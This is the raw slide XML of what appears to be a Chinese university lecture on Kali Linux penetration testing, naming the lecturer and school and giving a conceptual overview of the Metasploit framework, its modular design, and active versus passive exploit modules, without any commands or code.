Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/></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1"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="10810" y="0"/>
            <a:ext cx="12192000" cy="1314450"/>
            <a:chOff x="12" y="21"/>
            <a:chExt cx="5734" cy="555"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11271" name="Picture 62" descr="title_01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:lum bright="-6000"/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="12" y="21"/>
              <a:ext cx="2868" cy="555"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11272" name="Picture 63" descr="title_02"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:lum bright="-6000"/>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2880" y="21"/>
              <a:ext cx="2866" cy="555"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="矩形 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="213490" y="2127698"/>
            <a:ext cx="11772900" cy="1063433"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" spc="300" dirty="0">
                <a:ln w="11430" cmpd="sng">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="5400000" algn="t" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Kali Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" spc="300" dirty="0">
                <a:ln w="11430" cmpd="sng">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="5400000" algn="t" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>渗透测试</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11269" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3834320" y="3842986"/>
            <a:ext cx="8152070" cy="1962845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>姓        名： 张号逵</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>学        院： 网络空间安全学院</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>联系方式：  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>hkzhang@nwpu.edu.cn </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>                    18710847019</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56186" y="1115705"/>
            <a:ext cx="10972800" cy="1252537"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704524" y="2368242"/>
            <a:ext cx="10786067" cy="3451225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>是一个开源的、可下载的框架。通过它安全人员可以很容易的获取、挖掘计算机软件漏洞，并对其实施攻击。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>框架可以用来发现漏洞、利用漏洞、提交漏洞，并实施攻击。而且，用户还可以从其他漏洞扫描程序导入数据，基于漏洞主机的详细信息来发现可攻击漏洞，从而使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>有效载荷</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>对系统发起攻击。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>是目前在全世界的渗透测试领域中是应用最广泛，而且功能最齐全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的漏洞利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>框架和平台。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2430547" y="5146028"/>
            <a:ext cx="7123809" cy="1666667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2981992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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91548505-95E1-8B6B-A4D3-1B71F5A6A5F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9520" y="981556"/>
            <a:ext cx="12196761" cy="46014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21B6BB"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
              <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="25400" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="BA0000"/>
                </a:solidFill>
                <a:bevel/>
                <a:headEnd/>
                <a:tailEnd/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="121900" tIns="60949" rIns="121900" bIns="60949" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1218590" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2399">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6148" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FC7CC82-5648-9724-7467-5651D0BE247C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="168442" y="1256735"/>
            <a:ext cx="10193338" cy="717550"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>基本体系结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6149" name="内容占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C38FBFA6-43F4-7717-E76D-36141BE8B936}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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bwMode="auto">
          <a:xfrm>
            <a:off x="1801160" y="1998913"/>
            <a:ext cx="9638597" cy="48590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469E8634-618F-779E-0701-C8F1AD9E96B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="168442" y="3219899"/>
            <a:ext cx="1741638" cy="1785104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>开源</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块化设计</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>插件化扩展</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A27BE60C-44FD-A8CE-A753-14BD0EE4EFFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909349" y="1465711"/>
            <a:ext cx="7888146" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://zhuanlan.zhihu.com/p/551712456</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638424" y="2311381"/>
            <a:ext cx="10707355" cy="3451225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>渗透攻击模块主要利用发现的安全漏洞或配置弱点对目标系统进行攻击，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>以植入和运行攻击载荷</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>，从而获得目标系统的访问控制权。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>框架中渗透攻击模块可以按照安全漏洞所在的位置，分为主动渗透攻击与被动渗透攻击两大类。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>主动渗透攻击：针对某个特定的目标进行持续性渗透，直到完成任务</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>被动渗透攻击：引诱目标用户打开触发，等待进入主机连接时进行渗透</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A425EF52-9D37-CB96-E819-80B0112EF4C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="253492" y="1290722"/>
            <a:ext cx="11708815" cy="85756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3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>渗透攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3747193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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3F177DA-B60D-C984-69DA-B1334A0C7971}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9520" y="981556"/>
            <a:ext cx="12196761" cy="46014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21B6BB"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
              <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="25400" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="BA0000"/>
                </a:solidFill>
                <a:bevel/>
                <a:headEnd/>
                <a:tailEnd/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="121900" tIns="60949" rIns="121900" bIns="60949" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1218590" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2399">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
